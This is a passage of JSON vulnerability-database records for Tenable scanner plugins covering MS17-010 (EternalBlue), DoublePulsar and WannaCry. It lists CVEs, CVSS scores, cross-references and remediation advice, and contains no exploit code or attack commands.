"THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-08-11T13:58:48", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-11T13:58:48", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700059", "sourceData": "Binary data 700059.prm", "naslFamily": "Web Servers", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "solution": "Remove the Double Pulsar backdoor and disable SMBv1.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:58:48", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 1}], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-19T12:37:13", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-08-19T12:37:13", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700059", "sourceData": "Binary data 700059.prm", "naslFamily": "Web Servers", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "solution": "Remove the Double Pulsar backdoor and disable SMBv1.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "700099.PRM", "hash": "4514023ad2777a66ba0db81fa7e82cc6", "type": "nessus", "bulletinFamily": "scanner", "title": "Ransomware Traffic Detected (WannaCry)", "description": "The remote system may be affected by ransomware that encrypts most or all of the files on a user's computer. Then, the software demands that a ransom be paid in order to have the files decrypted. This attack is related to the recent ShadowBrokers dump containing NSA weaponized software exploits.", "published": "2017-05-15T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700099", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?cd7c91b0", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:36:49", "history": [{"bulletin": {"id": "700099.PRM", "hash": "57c66d538f7312c9b606ff3e3020056e", "type": "nessus", "bulletinFamily": "scanner", "title": "Ransomware Traffic Detected (WannaCry)", "description": "The remote system may be affected by ransomware that encrypts most or all of the files on a user's computer. Then, the software demands that a ransom be paid in order to have the files decrypted. This attack is related to the recent ShadowBrokers dump containing NSA weaponized software exploits.", "published": "2017-05-15T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700099", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?cd7c91b0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:58:22", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:58:22", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-08-11T13:58:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700099", "sourceData": "Binary data 700099.prm", "naslFamily": "Generic", "cpe": [], "solution": "A remote service may be attempting to target user data and potentially encrypt it, rendering it unattainable until the user pays a ransom to have it decrypted. This type of issue can quickly spread laterally through organizations. Inspect the system for malicious code, and follow appropriate incident response procedures.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:58:22", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-19T12:36:49", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-08-19T12:36:49", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700099", "sourceData": "Binary data 700099.prm", "naslFamily": "Generic", "cpe": [], "solution": "A remote service may be attempting to target user data and potentially encrypt it, rendering it unattainable until the user pays a ransom to have it decrypted. This type of issue can quickly spread laterally through organizations. Inspect the system for malicious code, and follow appropriate incident response procedures.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-22T13:01:22", "history": [{"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "f8cc500435fdab6b32ed7a3b6b64c4e28e08f4b4210e921f0ddf025d26a10830", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2017-06-28T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-06-29T03:49:19", "history": [], "viewCount": 1448, "enchantments": {}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n 